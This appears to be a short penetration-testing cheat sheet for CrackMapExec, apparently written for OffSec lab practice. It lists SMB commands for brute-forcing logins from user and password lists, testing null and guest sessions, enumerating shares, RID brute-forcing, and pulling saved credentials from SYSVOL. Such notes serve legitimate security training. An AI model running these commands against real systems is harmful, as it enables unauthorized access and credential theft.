# crackmapexec
### CrackMapExec
* https://www.infosecmatter.com/crackmapexec-module-library/

* Bruteforce with list of users and list of password
`cme smb 172.16.1.13 -u users -p passwords --shares`

* Check null session
`cme smb 192.168.240.152 -u ' ' -p '' --shares`



`crackmapexec smb vault.offsec -u 'guest' -p ''`
`crackmapexec smb vault.offsec -u 'guest' -p '' --shares`
`crackmapexec smb vault.offsec -u 'guest' -p '' --rid-brute`


---
* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#automate-the-sysvol-and-passwords-research
* check for credentials in sysvol
`cme smb ip -u 'user' -p "password" -M gpp_autologin`

